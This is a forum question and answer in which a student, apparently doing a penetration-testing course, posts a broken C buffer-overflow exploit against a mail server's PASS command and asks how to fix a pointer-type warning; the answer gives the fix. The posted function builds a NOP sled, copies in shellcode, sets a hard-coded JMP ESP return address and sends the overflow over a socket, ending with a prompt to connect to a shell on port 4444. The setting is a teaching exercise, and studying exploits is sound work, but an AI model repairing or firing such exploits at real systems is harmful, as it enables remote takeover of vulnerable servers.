Assignment from Incompatible Pointer Type In C Script

Question

In a course I'm taking, I was given a broken buffer overflow script written in C, and have to fix the broken coding. I've patched a few things so far, but am receiving this error message when trying to compile it (the error showed up from the initial code, not from anything I edited):

 

646-fixed.c: In function ‘exploit’:

646-fixed.c:48: warning: assignment from incompatible pointer type

 

Below is the function where the error is occurring. I'm not very familiar with C - but from the responses I received yesterday, I understand that this is happening due to ptr's type being int, & evil's type being char. What I don't understand is what I can do to fix this - can anybody help with this? You can also see the full script here  

void exploit(int sock) {
      FILE *test;
      int *ptr;
      char userbuf[] = "USER madivan\r\n";
      char evil[3001];
      char buf[3012];
      char receive[1024];
      char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
                       "\x90\x90\x90\x90\x90\x90\x90\x90";
      memset(buf, 0x00, 3012);
      memset(evil, 0x00, 3001);
      memset(evil, 0x43, 3000);
48    ptr = &evil;
      ptr = ptr + 652; // 2608 
      memcpy(ptr, &nopsled, 16);
      ptr = ptr + 4;
      memcpy(ptr, &shellcode, 317);
      *(long*)&evil[2600] = 0x7CB41010; // JMP ESP XP 7CB41020 FFE4 JMP ESP

      // banner
      recv(sock, receive, 200, 0);
      printf("[+] %s", receive);
      // user
      printf("[+] Sending Username...\n");
      send(sock, userbuf, strlen(userbuf), 0);
      recv(sock, receive, 200, 0);
      printf("[+] %s", receive);
      // passwd
      printf("[+] Sending Evil buffer...\n");
      sprintf(buf, "PASS %s\r\n", evil);
      //test = fopen("test.txt", "w");
      //fprintf(test, "%s", buf);
      //fclose(test);
      send(sock, buf, strlen(buf), 0);
      printf("[*] Done! Connect to the host on port 4444...\n\n");
}

Note: I posted this yesterday providing only a few lines of the code, and as a result, couldn't get a clear answer - so I deleted it and am reposting it.

Answer 1

The type of &evil is pointer to length 3001 array or char, or char (*)[3001]. The type of ptr is pointer to int, or int*. Those types are incompatible. You can't assign one to the other.

What you probably need is a pointer to the first element of evil. You can use a pointer to char, i.e. char*, and assign evil to it:

char *ptr;
....
ptr = evil;

Here, evil decays to a pointer to the first element to the array, so the assignment works. This is equivalent to assigning the address of the first element:

ptr = &evil[0];